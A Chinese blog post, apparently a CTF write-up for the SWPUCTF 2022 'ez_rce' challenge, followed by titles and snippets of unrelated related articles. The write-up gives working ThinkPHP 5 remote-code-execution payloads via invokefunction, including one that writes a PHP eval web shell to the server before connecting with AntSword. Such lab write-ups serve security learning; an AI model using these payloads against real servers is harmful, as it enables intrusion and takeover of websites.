[SWPUCTF 2022 新生赛]ez_rce

news/2025/2/25 16:39:20

打开题目就在线环境,发现只有一句话:真的什么都没有吗
F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到:
在这里插入图片描述
然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到:
在这里插入图片描述
然后访问:/NSS/index.php/
在这里插入图片描述
这里直接搜索ThingkPHP V5就能得到这个漏洞复现的方法,我就是根据搜索到的帖子的漏洞复现方法跟着做的。

payload:?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

在这里插入图片描述

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>(将php代码写入shell.php

在这里插入图片描述
再访问/NSS/shell.php
在这里插入图片描述
然后再
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>(删除/shell.php替换)

在这里插入图片描述
最后蚁剑连接,网址:http://node5.anna.nssctf.cn:22775/NSS/shell.php
密码为1
最后flag的路径为:/nss/ctf/flag
在这里插入图片描述


http://www.niftyadmin.cn/n/5865715.html

相关文章

面试题 - Vue 3 如何优化性能?

面试题 - Vue 3 如何优化性能&#xff1f; 最近&#xff0c;总有小伙伴来问我&#xff0c;在面试时应该如何回答关于优化方面的问题。其实&#xff0c;我们在日常的项目开发中&#xff0c;或多或少都接触过一些优化技巧&#xff0c;只是有时候自己没有特别留意&#xff0c;或者…

AI写代码工具ScriptEcho:赋能数据分析,驱动精准营销

在数字化时代&#xff0c;数据已成为企业发展的核心资产。而前端开发作为连接用户和数据的桥梁&#xff0c;其效率直接影响着数据分析的质量和营销决策的精准性。传统前端开发在处理海量用户行为数据时&#xff0c;常常面临效率低下、代码维护困难等挑战。然而&#xff0c;随着…

TensorFlow Lite 详解:原理、优化及基于树莓派的实战

&#x1f4cc; 1. 引言 在 AI 领域&#xff0c;深度学习模型的部署一直是一个重要课题。对于资源受限的嵌入式设备&#xff0c;如 树莓派、ARM 处理器设备、移动端 SoC&#xff0c;直接运行标准的 TensorFlow 可能会面临 计算能力不足、存储空间受限、功耗较高 等问题。 Tenso…

网络安全 linux学习计划 linux网络安全精要

2.使用命令行 文件系统层次标准&#xff08;FHS&#xff09;是一个文件和目录在Unix和Linux操作系统上面应该如何存储的定义。 /bin 重要的二进制可执行程序/boot 与系统启动有关的文件/etc 系统配置文件/home 普通用户家目录/lib 重要的系统库/media 可移动介质的挂载路径/m…

SpringBoot项目打包为jar包

1、确保项目配置正确 在pom.xml中&#xff0c;确保已经包含spring-boot-maven-plugin插件&#xff1a; <build><plugins><plugin><groupId>org.springframework.boot</groupId><artifactId>spring-boot-maven-plugin</artifactId>&…

Search API:让数据获取变得简单高效的搜索引擎代理商

Search API&#xff1a;让数据获取变得简单高效的搜索引擎代理商 在当今数字化时代&#xff0c;数据驱动的决策变得越来越重要&#xff0c;而获取精准、实时的数据是众多企业、研究机构和开发者的核心需求。然而&#xff0c;直接爬取搜索引擎或行业资讯网站可能会遇到诸多挑战&…

如何生成traceid以及可视化展示

根据你的需求&#xff0c;以下是一些可以生成唯一 traceId 并用于分布式链路追踪的工具和项目&#xff0c;这些项目支持生成唯一的 traceId&#xff0c;并将其用于日志记录和分布式追踪&#xff1a; 1. OpenTelemetry OpenTelemetry 是一个开源的观测框架&#xff0c;支持生成…

被AWS反撸了,试一下能否申请退还

向 AWS 客服提交退款申请&#xff0c;说明你是新用户&#xff0c;在免费试用期结束后没有留意到 EC2 仍在运行&#xff0c;导致了意外扣费&#xff0c;并请求 AWS 免除费用并退款。以下是具体操作步骤和申诉信模板&#xff1a; 申请退款的操作步骤 登录 AWS 控制台 访问 AWS B…